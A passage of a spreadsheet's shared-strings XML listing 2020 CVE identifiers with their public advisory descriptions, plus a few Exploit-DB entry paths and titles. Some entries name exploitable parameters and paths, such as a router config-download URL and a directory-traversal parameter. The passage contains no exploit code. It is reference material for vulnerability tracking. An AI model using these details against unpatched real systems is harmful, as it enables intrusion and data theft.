    <t>CVE-2020-35349</t>
  </si>
  <si>
    <t>Savsoft Quiz 5 is affected by: Cross Site Scripting (XSS) via field_title (aka a title on the custom fields page).</t>
  </si>
  <si>
    <t>CVE-2020-3535</t>
  </si>
  <si>
    <t>A vulnerability in the loading mechanism of specific DLLs in the Cisco Webex Teams client for Windows could allow an authenticated, local attacker to load a malicious library. To exploit this vulnerability, the attacker needs valid credentials on the Windows system. The vulnerability is due to incorrect handling of directory paths at run time. An attacker could exploit this vulnerability by placing a malicious DLL file in a specific location on the targeted system. This file will execute when the vulnerable application launches. A successful exploit could allow the attacker to execute arbitrary code on the targeted system with the privileges of another user&amp;rsquo;s account.</t>
  </si>
  <si>
    <t>CVE-2020-35358</t>
  </si>
  <si>
    <t>DomainMOD domainmod-v4.15.0 is affected by an insufficient session expiration vulnerability. On changing a password, both sessions using the changed password and old sessions in any other browser or device do not expire and remain active. Such flaws frequently give attackers unauthorized access to some system data or functionality.</t>
  </si>
  <si>
    <t>CVE-2020-35359</t>
  </si>
  <si>
    <t>Pure-FTPd 1.0.48 allows remote attackers to prevent legitimate server use by making enough connections to exceed the connection limit.</t>
  </si>
  <si>
    <t>CVE-2020-3536</t>
  </si>
  <si>
    <t>A vulnerability in the web-based management interface of Cisco SD-WAN vManage Software could allow an authenticated, remote attacker to conduct a cross-site scripting (XSS) attack against a user of the interface. The vulnerability exists because the web-based management interface does not properly validate user-supplied input. An attacker could exploit this vulnerability by inserting malicious data into a specific data field in an affected interface. A successful exploit could allow the attacker to execute arbitrary script code in the context of the affected interface.</t>
  </si>
  <si>
    <t>CVE-2020-35362</t>
  </si>
  <si>
    <t>DEXT5Upload 2.7.1262310 and earlier is affected by Directory Traversal in handler/dext5handler.jsp. This could allow remote files to be downloaded via a dext5CMD=downloadRequest action with traversal in the fileVirtualPath parameter (the attacker must provide the correct fileOrgName value).</t>
  </si>
  <si>
    <t>CVE-2020-35364</t>
  </si>
  <si>
    <t>Beijing Huorong Internet Security 5.0.55.2 allows a non-admin user to escalate privileges by injecting code into a process, and then waiting for a Huorong services restart or a system reboot.</t>
  </si>
  <si>
    <t>CVE-2020-3537</t>
  </si>
  <si>
    <t>A vulnerability in Cisco Jabber for Windows software could allow an authenticated, remote attacker to gain access to sensitive information. The vulnerability is due to improper validation of message contents. An attacker could exploit this vulnerability by sending specially crafted messages that contain Universal Naming Convention (UNC) links to a targeted user and convincing the user to follow the provided link. A successful exploit could allow the attacker to cause the application to access a remote system, possibly allowing the attacker to gain access to sensitive information that the attacker could use in additional attacks.</t>
  </si>
  <si>
    <t>CVE-2020-35370</t>
  </si>
  <si>
    <t>A RCE vulnerability exists in Raysync below 3.3.3.8. An unauthenticated unauthorized attacker sending a specifically crafted request to override the specific file in server with malicious content can login as "admin", then to modify specific shell file to achieve remote code execution(RCE) on the hosting server.</t>
  </si>
  <si>
    <t>CVE-2020-35373</t>
  </si>
  <si>
    <t>In Fiyo CMS 2.0.6.1, the 'tag' parameter results in an unauthenticated XSS attack.</t>
  </si>
  <si>
    <t>CVE-2020-35376</t>
  </si>
  <si>
    <t>Xpdf 4.02 allows stack consumption because of an incorrect subroutine reference in a Type 1C font charstring, related to the FoFiType1C::getOp() function.</t>
  </si>
  <si>
    <t>CVE-2020-35378</t>
  </si>
  <si>
    <t>SQL Injection in the login page in Online Bus Ticket Reservation 1.0 allows attackers to execute arbitrary SQL commands and bypass authentication via the username and password fields.</t>
  </si>
  <si>
    <t>CVE-2020-35380</t>
  </si>
  <si>
    <t>GJSON before 1.6.4 allows attackers to cause a denial of service via crafted JSON.</t>
  </si>
  <si>
    <t>CVE-2020-35381</t>
  </si>
  <si>
    <t>jsonparser 1.0.0 allows attackers to cause a denial of service (panic: runtime error: slice bounds out of range) via a GET call.</t>
  </si>
  <si>
    <t>CVE-2020-35382</t>
  </si>
  <si>
    <t>SQL Injection in Classbooking before 2.4.1 via the username field of a CSV file when adding a new user.</t>
  </si>
  <si>
    <t>CVE-2020-35388</t>
  </si>
  <si>
    <t>rainrocka xinhu 2.1.9 allows remote attackers to obtain sensitive information via an index.php?a=gettotal request in which the ajaxbool value is manipulated to be true.</t>
  </si>
  <si>
    <t>CVE-2020-35391</t>
  </si>
  <si>
    <t>Tenda N300 F3 12.01.01.48 devices allow remote attackers to obtain sensitive information (possibly including an http_passwd line) via a direct request for cgi-bin/DownloadCfg/RouterCfm.cfg, a related issue to CVE-2017-14942. NOTE: the vulnerability report may suggest that either a ? character must be placed after the RouterCfm.cfg filename, or that the HTTP request headers must be unusual, but it is not known why these are relevant to the device's HTTP response behavior.</t>
  </si>
  <si>
    <t>CVE-2020-35395</t>
  </si>
  <si>
    <t>XSS in the Add Expense Component of EGavilan Media Expense Management System 1.0 allows an attacker to permanently store malicious JavaScript code via the 'description' field</t>
  </si>
  <si>
    <t>CVE-2020-35396</t>
  </si>
  <si>
    <t>EGavilan Barcodes generator 1.0 is affected by: Cross Site Scripting (XSS) via the index.php. An Attacker is able to inject the XSS payload in the web application each time a user visits the website.</t>
  </si>
  <si>
    <t>CVE-2020-35398</t>
  </si>
  <si>
    <t>An issue was discovered in UTI Mutual fund Android application 5.4.18 and prior, allows attackers to brute force enumeration of usernames determined by the error message returned after invalid credentials are attempted.</t>
  </si>
  <si>
    <t>CVE-2020-3541</t>
  </si>
  <si>
    <t>A vulnerability in the media engine component of Cisco Webex Meetings Client for Windows, Cisco Webex Meetings Desktop App for Windows, and Cisco Webex Teams for Windows could allow an authenticated, local attacker to gain access to sensitive information. The vulnerability is due to unsafe logging of authentication requests by the affected software. An attacker could exploit this vulnerability by reading log files that are stored in the application directory. A successful exploit could allow the attacker to gain access to sensitive information, which could be used in further attacks.</t>
  </si>
  <si>
    <t>exploits/php/webapps/49281.txt</t>
  </si>
  <si>
    <t>PHPJabbers Appointment Scheduler 2.3 - Reflected XSS (Cross-Site Scripting)</t>
  </si>
  <si>
    <t>2020-12-17</t>
  </si>
  <si>
    <t>CVE-2020-35416</t>
  </si>
  <si>
    <t>Multiple cross-site scripting (XSS) vulnerabilities exist in PHPJabbers Appointment Scheduler 2.3, in the index.php admin login webpage (with different request parameters), allows remote attackers to inject arbitrary web script or HTML.</t>
  </si>
  <si>
    <t>CVE-2020-35418</t>
  </si>
  <si>
    <t>Cross Site Scripting (XSS) in the contact page of Group Office CRM 6.4.196 by uploading a crafted svg file.</t>
  </si>
  <si>
    <t>CVE-2020-35419</t>
  </si>
  <si>
    <t>Cross Site Scripting (XSS) in Group Office CRM 6.4.196 via the SET_LANGUAGE parameter.</t>
  </si>
  <si>
    <t>CVE-2020-3542</t>
  </si>
  <si>
    <t>A vulnerability in Cisco Webex Training could allow an authenticated, remote attacker to join a password-protected meeting without providing the meeting password. The vulnerability is due to improper validation of input to API requests that are a part of meeting join flow. An attacker could exploit this vulnerability by sending an API request to the application, which would return a URL that includes a meeting join page that is prepopulated with the meeting username and password. A successful exploit could allow the attacker to join the password-protected meeting. The attacker would be visible in the attendee list of the meeting.</t>
  </si>
  <si>
    <t>CVE-2020-35427</t>
  </si>
  <si>
    <t>SQL injection vulnerability in PHPGurukul Employee Record Management System 1.1 allows remote attackers to execute arbitrary SQL commands and bypass authentication.</t>
  </si>
  <si>
    <t>CVE-2020-3543</t>
  </si>
  <si>
    <t>exploits/php/webapps/49346.txt</t>
  </si>
  <si>
    <t>Subrion CMS 4.2.1 - 'avatar[path]' XSS</t>
  </si>
  <si>
    <t>CVE-2020-35430</t>
  </si>
  <si>
    <t>SQL Injection in com/inxedu/OS/edu/controller/letter/AdminMsgSystemController in Inxedu v2.0.6 via the ids parameter to admin/letter/delsystem.</t>
  </si>
  <si>
    <t>CVE-2020-35437</t>
  </si>
  <si>
    <t>Subrion CMS 4.2.1 is affected by: Cross Site Scripting (XSS) through the avatar[path] parameter in a POST request to the /_core/profile/ URI.</t>
  </si>
  <si>
    <t>CVE-2020-35438</t>
  </si>
  <si>
    <t>Cross Site Scripting (XSS) vulnerability in the kk Star Ratings plugin before 4.1.5.</t>
  </si>
  <si>
    <t>CVE-2020-3544</t>
  </si>
  <si>
    <t>A vulnerability in the Cisco Discovery Protocol implementation for Cisco Video Surveillance 8000 Series IP Cameras could allow an unauthenticated, adjacent attacker to execute arbitrary code on an affected device or cause the device to reload. This vulnerability is due to missing checks when an IP camera processes a Cisco Discovery Protocol packet. An attacker could exploit this vulnerability by sending a malicious Cisco Discovery Protocol packet to an affected device. A successful exploit could allow the attacker to execute code on the affected IP camera or cause it to reload unexpectedly, resulting in a denial of service (DoS) condition. Note: Cisco Discovery Protocol is a Layer 2 protocol. To exploit this vulnerability, an attacker must be in the same broadcast domain as the affected device (Layer 2 adjacent).</t>
  </si>
  <si>
    <t>CVE-2020-35441</t>
  </si>
  <si>
    <t>FDCMS (aka Fangfa Content Management System) 4.0 contains a front-end SQL injection via Admin/Lib/Action/FloginAction.class.php.</t>
  </si>
  <si>
    <t>CVE-2020-35442</t>
  </si>
  <si>
    <t>FDCMS (also known as Fangfa Content Management System) 4.0 allows remote attackers to get a webshell in the background via Front/lib/Action/FindexAction.class.php.</t>
  </si>
  <si>
    <t>CVE-2020-35448</t>
  </si>
  <si>
    <t>An issue was discovered in the Binary File Descriptor (BFD) library (aka libbfd), as distributed in GNU Binutils 2.35.1. A heap-based buffer over-read can occur in bfd_getl_signed_32 in libbfd.c because sh_entsize is not validated in _bfd_elf_slurp_secondary_reloc_section in elf.c.</t>
  </si>
  <si>
    <t>CVE-2020-3545</t>
  </si>
  <si>
    <t>A vulnerability in Cisco FXOS Software could allow an authenticated, local attacker with administrative credentials to cause a buffer overflow condition. The vulnerability is due to incorrect bounds checking of values that are parsed from a specific file. An attacker could exploit this vulnerability by supplying a crafted file that, when it is processed, may cause a stack-based buffer overflow. A successful exploit could allow the attacker to execute arbitrary code on the underlying operating system with root privileges. An attacker would need to have valid administrative credentials to exploit this vulnerability.</t>
  </si>
  <si>
    <t>CVE-2020-35450</t>
  </si>
  <si>
    <t>Gobby 0.4.11 allows a NULL pointer dereference in the D-Bus handler for certain set_language calls.</t>
  </si>
  <si>
    <t>CVE-2020-35451</t>
  </si>
  <si>
    <t>There is a race condition in OozieSharelibCLI in Apache Oozie before version 5.2.1 which allows a malicious attacker to replace the files in Oozie's sharelib during it's creation.</t>
  </si>
  <si>
    <t>CVE-2020-35452</t>
  </si>
  <si>
    <t>Apache HTTP Server versions 2.4.0 to 2.4.46 A specially crafted Digest nonce can cause a stack overflow in mod_auth_digest. There is no report of this overflow being exploitable, nor the Apache HTTP Server team could create one, though some particular compiler and/or compilation option might make it possible, with limited consequences anyway due to the size (a single byte) and the value (zero byte) of the overflow</t>
  </si>
  <si>
    <t>CVE-2020-35453</t>
  </si>
  <si>
    <t>HashiCorp Vault Enterprise’s Sentinel EGP policy feature incorrectly allowed requests to be processed in parent and sibling namespaces. Fixed in 1.5.6 and 1.6.1.</t>
  </si>
  <si>
    <t>CVE-2020-35454</t>
  </si>
  <si>
    <t>The Taidii Diibear Android application 2.4.0 and all its derivatives allow attackers to obtain user credentials from an Android backup because of insecure application configuration.</t>
  </si>
  <si>
    <t>CVE-2020-35455</t>
  </si>
  <si>
    <t>The Taidii Diibear Android application 2.4.0 and all its derivatives allow attackers to obtain user credentials from Shared Preferences and the SQLite database because of insecure data storage.</t>
  </si>
  <si>
    <t>CVE-2020-35456</t>
  </si>
  <si>
    <t>The Taidii Diibear Android application 2.4.0 and all its derivatives allow attackers to view private chat messages and media files via logcat because of excessive logging.</t>
  </si>
  <si>
    <t>CVE-2020-35457</t>
  </si>
  <si>
    <t>** DISPUTED ** GNOME GLib before 2.65.3 has an integer overflow, that might lead to an out-of-bounds write, in g_option_group_add_entries. NOTE: the vendor's position is "Realistically this is not a security issue. The standard pattern is for callers to provide a static list of option entries in a fixed number of calls to g_option_group_add_entries()." The researcher states that this pattern is undocumented.</t>
  </si>
  <si>
    <t>CVE-2020-35458</t>
  </si>
  <si>
    <t>An issue was discovered in ClusterLabs Hawk 2.x through 2.3.0-x. There is a Ruby shell code injection issue via the hawk_remember_me_id parameter in the login_from_cookie cookie. The user logout routine could be used by unauthenticated remote attackers to execute code as hauser.</t>
  </si>
  <si>
    <t>CVE-2020-35459</t>
  </si>
  <si>
    <t>An issue was discovered in ClusterLabs crmsh through 4.2.1. Local attackers able to call "crm history" (when "crm" is run) were able to execute commands via shell code injection to the crm history commandline, potentially allowing escalation of privileges.</t>
  </si>
  <si>
    <t>CVE-2020-3546</t>
  </si>
  <si>
    <t>A vulnerability in the web-based management interface of Cisco AsyncOS software for Cisco Email Security Appliance (ESA) could allow an unauthenticated, remote attacker to access sensitive information on an affected device. The vulnerability is due to insufficient validation of requests that are sent to the web-based management interface. An attacker could exploit this vulnerability by sending a crafted request to the interface of an affected device. A successful exploit could allow the attacker to obtain the IP addresses that are configured on the internal interfaces of the affected device. There is a workaround that addresses this vulnerability.</t>
  </si>
  <si>
    <t>CVE-2020-35460</t>
  </si>
  <si>
    <t>common/InputStreamHelper.java in Packwood MPXJ before 8.3.5 allows directory traversal in the zip stream handler flow, leading to the writing of files to arbitrary locations.</t>
  </si>
  <si>
    <t>CVE-2020-35462</t>
  </si>
  <si>
    <t>Version 3.16.0 of the CoScale agent Docker image contains a blank password for the root user. Systems deployed using affected versions of the CoScale agent container may allow a remote attacker to achieve root access with a blank password.</t>
  </si>
  <si>
    <t>CVE-2020-35463</t>
  </si>
  <si>
    <t>Version 1.0.0 of the Instana Dynamic APM Docker image contains a blank password for the root user. Systems deployed using affected versions of the Instana Dynamic APM container may allow a remote attacker to achieve root access with a blank password.</t>
  </si>
  <si>
    <t>CVE-2020-35464</t>
  </si>
  <si>
    <t>Version 1.3.0 of the Weave Cloud Agent Docker image contains a blank password for the root user. Systems deployed using affected versions of the Weave Cloud Agent container may allow a remote attacker to achieve root access with a blank password.</t>
  </si>
  <si>
    <t>CVE-2020-35465</t>
  </si>
  <si>
    <t>The FullArmor HAPI File Share Mount Docker image through 2020-12-14 contains a blank password for the root user. Systems deployed using affected versions of the FullArmor HAPI File Share Mount container may allow the remote attacker to achieve root access with a blank password.</t>
  </si>
  <si>
    <t>CVE-2020-35466</t>
  </si>
  <si>
    <t>The Blackfire Docker image through 2020-12-14 contains a blank password for the root user. Systems deployed using affected versions of the Blackfire container may allow a remote attacker to achieve root access with a blank password.</t>
  </si>
  <si>
    <t>CVE-2020-35467</t>
  </si>
  <si>
    <t>The Docker Docs Docker image through 2020-12-14 contains a blank password for the root user. Systems deployed using affected versions of the Docker Docs container may allow a remote attacker to achieve root access with a blank password.</t>
  </si>
  <si>
    <t>CVE-2020-35468</t>
  </si>
  <si>
    <t>The Appbase streams Docker image 2.1.2 contains a blank password for the root user. Systems deployed using affected versions of the streams container may allow a remote attacker to achieve root access with a blank password.</t>
  </si>
  <si>
    <t>CVE-2020-35469</t>
  </si>
  <si>
    <t>The Software AG Terracotta Server OSS Docker image 5.4.1 contains a blank password for the root user. Systems deployed using affected versions of the Terracotta Server OSS container may allow a remote attacker to achieve root access with a blank password.</t>
  </si>
  <si>
    <t>CVE-2020-3547</t>
  </si>
  <si>
    <t>A vulnerability in the web-based management interface of Cisco AsyncOS software for Cisco Email Security Appliance (ESA), Cisco Content Security Management Appliance (SMA), and Cisco Web Security Appliance (WSA) could allow an authenticated, remote attacker to access sensitive information on an affected device. The vulnerability exists because an insecure method is used to mask certain passwords on the web-based management interface. An attacker could exploit this vulnerability by looking at the raw HTML code that is received from the interface. A successful exploit could allow the attacker to obtain some of the passwords configured throughout the interface.</t>
  </si>
  <si>
    <t>CVE-2020-35470</t>
  </si>
  <si>
    <t>Envoy before 1.16.1 logs an incorrect downstream address because it considers only the directly connected peer, not the information in the proxy protocol header. This affects situations with tcp-proxy as the network filter (not HTTP filters).</t>
  </si>
  <si>
    <t>CVE-2020-35471</t>
  </si>
  <si>
    <t>Envoy before 1.16.1 mishandles dropped and truncated datagrams, as demonstrated by a segmentation fault for a UDP packet size larger than 1500.</t>
  </si>
  <si>
    <t>CVE-2020-35473</t>
  </si>
  <si>
    <t>An information leakage vulnerability in the Bluetooth Low Energy advertisement scan response in Bluetooth Core Specifications 4.0 through 5.2, and extended scan response in Bluetooth Core Specifications 5.0 through 5.2, may be used to identify devices using Resolvable Private Addressing (RPA) by their response or non-response to specific scan requests from remote addresses. RPAs that have been associated with a specific remote device may also be used to identify a peer in the same manner by using its reaction to an active scan request. This has also been called an allowlist-based side channel.</t>
  </si>
  <si>
    <t>CVE-2020-35474</t>
  </si>
  <si>
    <t>In MediaWiki before 1.35.1, the combination of Html::rawElement and Message::text leads to XSS because the definition of MediaWiki:recentchanges-legend-watchlistexpiry can be changed onwiki so that the output is raw HTML.</t>
  </si>
  <si>
    <t>CVE-2020-35475</t>
  </si>
  <si>
    <t>In MediaWiki before 1.35.1, the messages userrights-expiry-current and userrights-expiry-none can contain raw HTML. XSS can happen when a user visits Special:UserRights but does not have rights to change all userrights, and the table on the left side has unchangeable groups in it. (The right column with the changeable groups is not affected and is escaped correctly.)</t>
  </si>
  <si>
    <t>CVE-2020-35476</t>
  </si>
  <si>
    <t>A remote code execution vulnerability occurs in OpenTSDB through 2.4.0 via command injection in the yrange parameter. The yrange value is written to a gnuplot file in the /tmp directory. This file is then executed via the mygnuplot.sh shell script. (tsd/GraphHandler.java attempted to prevent command injections by blocking backticks but this is insufficient.)</t>
  </si>
  <si>
    <t>CVE-2020-35477</t>
  </si>
  <si>
    <t>MediaWiki before 1.35.1 blocks legitimate attempts to hide log entries in some situations. If one sets MediaWiki:Mainpage to Special:MyLanguage/Main Page, visits a log entry on Special:Log, and toggles the "Change visibility of selected log entries" checkbox (or a tags checkbox) next to it, there is a redirection to the main page's action=historysubmit (instead of the desired behavior in which a revision-deletion form appears).</t>
  </si>
  <si>
    <t>CVE-2020-35478</t>
  </si>
  <si>
    <t>MediaWiki before 1.35.1 allows XSS via BlockLogFormatter.php. MediaWiki:blanknamespace potentially can be output as raw HTML with SCRIPT tags via LogFormatter::makePageLink(). This affects MediaWiki 1.33.0 and later.</t>
  </si>
  <si>
    <t>CVE-2020-35479</t>
  </si>
  <si>
    <t>MediaWiki before 1.35.1 allows XSS via BlockLogFormatter.php. Language::translateBlockExpiry itself does not escape in all code paths. For example, the return of Language::userTimeAndDate is is always unsafe for HTML in a month value. This affects MediaWiki 1.12.0 and later.</t>
  </si>
  <si>
    <t>CVE-2020-35480</t>
  </si>
  <si>
    <t>An issue was discovered in MediaWiki before 1.35.1. Missing users (accounts that don't exist) and hidden users (accounts that have been explicitly hidden due to being abusive, or similar) that the viewer cannot see are handled differently, exposing sensitive information about the hidden status to unprivileged viewers. This exists on various code paths.</t>
  </si>
  <si>
    <t>CVE-2020-35481</t>
  </si>
  <si>
    <t>SolarWinds Serv-U before 15.2.2 allows Unauthenticated Macro Injection.</t>
  </si>
  <si>
    <t>CVE-2020-35482</t>
  </si>
  <si>
    <t>SolarWinds Serv-U before 15.2.2 allows authenticated reflected XSS.</t>
  </si>
  <si>
    <t>CVE-2020-35483</t>
  </si>
  <si>
    <t>AnyDesk before 6.1.0 on Windows, when run in portable mode on a system where the attacker has write access to the application directory, allows this attacker to compromise a local user account via a read-only setting for a Trojan horse gcapi.dll file.</t>
  </si>
  <si>
    <t>CVE-2020-35488</t>
  </si>
  <si>
    <t>The fileop module of the NXLog service in NXLog Community Edition 2.10.2150 allows remote attackers to cause a denial of service (daemon crash) via a crafted Syslog payload to the Syslog service. This attack requires a specific configuration. Also, the name of the directory created must use a Syslog field. (For example, on Linux it is not possible to create a .. directory. On Windows, it is not possible to create a CON directory.)</t>
  </si>
  <si>
    <t>CVE-2020-35489</t>
  </si>
  <si>
    <t>The contact-form-7 (aka Contact Form 7) plugin before 5.3.2 for WordPress allows Unrestricted File Upload and remote code execution because a filename may contain special characters.</t>
  </si>
  <si>
    <t>CVE-2020-3549</t>
  </si>
  <si>
    <t>A vulnerability in the sftunnel functionality of Cisco Firepower Management Center (FMC) Software and Cisco Firepower Threat Defense (FTD) Software could allow an unauthenticated, remote attacker to obtain the device registration hash. The vulnerability is due to insufficient sftunnel negotiation protection during initial device registration. An attacker in a man-in-the-middle position could exploit this vulnerability by intercepting a specific flow of the sftunnel communication between an FMC device and an FTD device. A successful exploit could allow the attacker to decrypt and modify the sftunnel communication between FMC and FTD devices, allowing the attacker to modify configuration data sent from an FMC device to an FTD device or alert data sent from an FTD device to an FMC device.</t>
  </si>
  <si>
    <t>CVE-2020-35490</t>
  </si>
  <si>
    <t>FasterXML jackson-databind 2.x before 2.9.10.8 mishandles the interaction between serialization gadgets and typing, related to org.apache.commons.dbcp2.datasources.PerUserPoolDataSource.</t>
  </si>
  <si>
    <t>CVE-2020-35491</t>
  </si>
  <si>
    <t>FasterXML jackson-databind 2.x before 2.9.10.8 mishandles the interaction between serialization gadgets and typing, related to org.apache.commons.dbcp2.datasources.SharedPoolDataSource.</t>
  </si>
  <si>
    <t>CVE-2020-35492</t>
  </si>
  <si>
    <t>A flaw was found in cairo's image-compositor.c in all versions prior to 1.17.4. This flaw allows an attacker who can provide a crafted input file to cairo's image-compositor (for example, by convincing a user to open a file in an application using cairo, or if an application uses cairo on untrusted input) to cause a stack buffer overflow -&gt; out-of-bounds WRITE. The highest impact from this vulnerability is to confidentiality, integrity, as well as system availability.</t>
  </si>
  <si>
    <t>CVE-2020-35493</t>
  </si>
  <si>
    <t>A flaw exists in binutils in bfd/pef.c. An attacker who is able to submit a crafted PEF file to be parsed by objdump could cause a heap buffer overflow -&gt; out-of-bounds read that could lead to an impact to application availability. This flaw affects binutils versions prior to 2.34.</t>
  </si>
  <si>
    <t>CVE-2020-35494</t>
  </si>
  <si>
    <t>There's a flaw in binutils /opcodes/tic4x-dis.c. An attacker who is able to submit a crafted input file to be processed by binutils could cause usage of uninitialized memory. The highest threat is to application availability with a lower threat to data confidentiality. This flaw affects binutils versions prior to 2.34.</t>
  </si>
  <si>
    <t>CVE-2020-35495</t>
  </si>
  <si>
    <t>There's a flaw in binutils /bfd/pef.c. An attacker who is able to submit a crafted input file to be processed by the objdump program could cause a null pointer dereference. The greatest threat from this flaw is to application availability. This flaw affects binutils versions prior to 2.34.</t>
  </si>
  <si>
    <t>CVE-2020-35496</t>
  </si>
  <si>
    <t>There's a flaw in bfd_pef_scan_start_address() of bfd/pef.c in binutils which could allow an attacker who is able to submit a crafted file to be processed by objdump to cause a NULL pointer dereference. The greatest threat of this flaw is to application availability. This flaw affects binutils versions prior to 2.34.</t>
  </si>
  <si>
    <t>CVE-2020-35497</t>
  </si>
  <si>
    <t>A flaw was found in ovirt-engine 4.4.3 and earlier allowing an authenticated user to read other users' personal information, including name, email and public SSH key.</t>
  </si>
  <si>
    <t>CVE-2020-35498</t>
  </si>
  <si>
    <t>A vulnerability was found in openvswitch. A limitation in the implementation of userspace packet parsing can allow a malicious user to send a specially crafted packet causing the resulting megaflow in the kernel to be too wide, potentially causing a denial of service. The highest threat from this vulnerability is to system availability.</t>
  </si>
  <si>
    <t>CVE-2020-35499</t>
  </si>
  <si>
    <t>A NULL pointer dereference flaw in Linux kernel versions prior to 5.11 may be seen if sco_sock_getsockopt function in net/bluetooth/sco.c do not have a sanity check for a socket connection, when using BT_SNDMTU/BT_RCVMTU for SCO sockets. This could allow a local attacker with a special user privilege to crash the system (DOS) or leak kernel internal information.</t>
  </si>
  <si>
    <t>CVE-2020-3550</t>
  </si>
  <si>
    <t>A vulnerability in the sfmgr daemon of Cisco Firepower Management Center (FMC) Software and Cisco Firepower Threat Defense (FTD) Software could allow an authenticated, remote attacker to perform directory traversal and access directories outside the restricted path. The vulnerability is due to insufficient input validation. An attacker could exploit this vulnerability by using a relative path in specific sfmgr commands. An exploit could allow the attacker to read or write arbitrary files on an sftunnel-connected peer device.</t>
  </si>
  <si>
    <t>CVE-2020-35501</t>
  </si>
  <si>
    <t>A flaw was found in the Linux kernels implementation of audit rules, where a syscall can unexpectedly not be correctly not be logged by the audit subsystem</t>
  </si>
  <si>
    <t>CVE-2020-35502</t>
  </si>
  <si>
    <t>A flaw was found in Privoxy in versions before 3.0.29. Memory leaks when a response is buffered and the buffer limit is reached or Privoxy is running out of memory can lead to a system crash.</t>
  </si>
  <si>
    <t>CVE-2020-35503</t>
  </si>
  <si>
    <t>A NULL pointer dereference flaw was found in the megasas-gen2 SCSI host bus adapter emulation of QEMU in versions before and including 6.0. This issue occurs in the megasas_command_cancelled() callback function while dropping a SCSI request. This flaw allows a privileged guest user to crash the QEMU process on the host, resulting in a denial of service. The highest threat from this vulnerability is to system availability.</t>
  </si>
  <si>
    <t>CVE-2020-35504</t>
  </si>
  <si>
    <t>A NULL pointer dereference flaw was found in the SCSI emulation support of QEMU in versions before 6.0.0. This flaw allows a privileged guest user to crash the QEMU process on the host, resulting in a denial of service. The highest threat from this vulnerability is to system availability.</t>
  </si>
  <si>
    <t>CVE-2020-35505</t>
  </si>
  <si>
    <t>A NULL pointer dereference flaw was found in the am53c974 SCSI host bus adapter emulation of QEMU in versions before 6.0.0. This issue occurs while handling the 'Information Transfer' command. This flaw allows a privileged guest user to crash the QEMU process on the host, resulting in a denial of service. The highest threat from this vulnerability is to system availability.</t>
  </si>
  <si>
    <t>CVE-2020-35506</t>
  </si>
  <si>
    <t>A use-after-free vulnerability was found in the am53c974 SCSI host bus adapter emulation of QEMU in versions before 6.0.0 during the handling of the 'Information Transfer' command (CMD_TI). This flaw allows a privileged guest user to crash the QEMU process on the host, resulting in a denial of service or potential code execution with the privileges of the QEMU process.</t>
  </si>
  <si>
    <t>CVE-2020-35507</t>
  </si>
  <si>
    <t>There's a flaw in bfd_pef_parse_function_stubs of bfd/pef.c in binutils in versions prior to 2.34 which could allow an attacker who is able to submit a crafted file to be processed by objdump to cause a NULL pointer dereference. The greatest threat of this flaw is to application availability.</t>
  </si>
  <si>
    <t>CVE-2020-35508</t>
  </si>
  <si>
    <t>A flaw possibility of race condition and incorrect initialization of the process id was found in the Linux kernel child/parent process identification handling while filtering signal handlers. A local attacker is able to abuse this flaw to bypass checks to send any signal to a privileged process.</t>
  </si>
  <si>
    <t>CVE-2020-35509</t>
  </si>
  <si>
    <t>A flaw was found in keycloak affecting versions 11.0.3 and 12.0.0. An expired certificate would be accepted by the direct-grant authenticator because of missing time stamp validations. The highest threat from this vulnerability is to data confidentiality and integrity.</t>
  </si>
  <si>
    <t>CVE-2020-3551</t>
  </si>
  <si>
    <t>A vulnerability in the web-based management interface of Cisco Identity Services Engine (ISE) could allow an unauthenticated, remote attacker to conduct a cross-site scripting (XSS) attack against a user of the interface of an affected device. The vulnerability exists because the web-based management interface does not properly validate user-supplied input. An attacker could exploit this vulnerability by persuading a user of an affected interface to click a crafted link. A successful exploit could allow the attacker to execute arbitrary script code in the context of the affected interface or access sensitive, browser-based information.</t>
  </si>
  <si>
    <t>CVE-2020-35510</t>
  </si>
  <si>
    <t>A flaw was found in jboss-remoting in versions before 5.0.20.SP1-redhat-00001. A malicious attacker could cause threads to hold up forever in the EJB server by writing a sequence of bytes corresponding to the expected messages of a successful EJB client request, but omitting the ACK messages, or just tamper with jboss-remoting code, deleting the lines that send the ACK message from the EJB client code resulting in a denial of service. The highest threat from this vulnerability is to system availability.</t>
  </si>
  <si>
    <t>CVE-2020-35511</t>
  </si>
  <si>
    <t>A global buffer overflow was discovered in pngcheck function in pngcheck-2.4.0(5 patches applied) via a crafted png file.</t>
  </si>
  <si>
    <t>CVE-2020-35512</t>
  </si>
  <si>
    <t>A use-after-free flaw was found in D-Bus Development branch &lt;= 1.13.16, dbus-1.12.x stable branch &lt;= 1.12.18, and dbus-1.10.x and older branches &lt;= 1.10.30 when a system has multiple usernames sharing the same UID. When a set of policy rules references these usernames, D-Bus may free some memory in the heap, which is still used by data structures necessary for the other usernames sharing the UID, possibly leading to a crash or other undefined behaviors</t>
  </si>
  <si>
    <t>CVE-2020-35513</t>
  </si>
  <si>
    <t>A flaw incorrect umask during file or directory modification in the Linux kernel NFS (network file system) functionality was found in the way user create and delete object using NFSv4.2 or newer if both simultaneously accessing the NFS by the other process that is not using new NFSv4.2. A user with access to the NFS could use this flaw to starve the resources causing denial of service.</t>
  </si>
  <si>
    <t>271</t>
  </si>
  <si>
    <t>CVE-2020-35514</t>
  </si>
  <si>
    <t>An insecure modification flaw in the /etc/kubernetes/kubeconfig file was found in OpenShift. This flaw allows an attacker with access to a running container which mounts /etc/kubernetes or has local access to the node, to copy this kubeconfig file and attempt to add their own node to the OpenShift cluster. The highest threat from this vulnerability is to confidentiality, integrity, as well as system availability. This flaw affects versions before openshift4/ose-machine-config-operator v4.7.0-202105111858.p0.</t>
  </si>
  <si>
    <t>CVE-2020-35517</t>
  </si>
  <si>
    <t>A flaw was found in qemu. A host privilege escalation issue was found in the virtio-fs shared file system daemon where a privileged guest user is able to create a device special file in the shared directory and use it to r/w access host devices.</t>
  </si>
  <si>
    <t>CVE-2020-35518</t>
  </si>
  <si>
    <t>When binding against a DN during authentication, the reply from 389-ds-base will be different whether the DN exists or not. This can be used by an unauthenticated attacker to check the existence of an entry in the LDAP database.</t>
  </si>
  <si>
    <t>CVE-2020-35519</t>
  </si>
  <si>
    <t>An out-of-bounds (OOB) memory access flaw was found in x25_bind in net/x25/af_x25.c in the Linux kernel version v5.12-rc5. A bounds check failure allows a local attacker with a user account on the system to gain access to out-of-bounds memory, leading to a system crash or a leak of internal kernel information. The highest threat from this vulnerability is to confidentiality, integrity, as well as system availability.</t>
  </si>
  <si>
    <t>CVE-2020-3552</t>
  </si>
  <si>
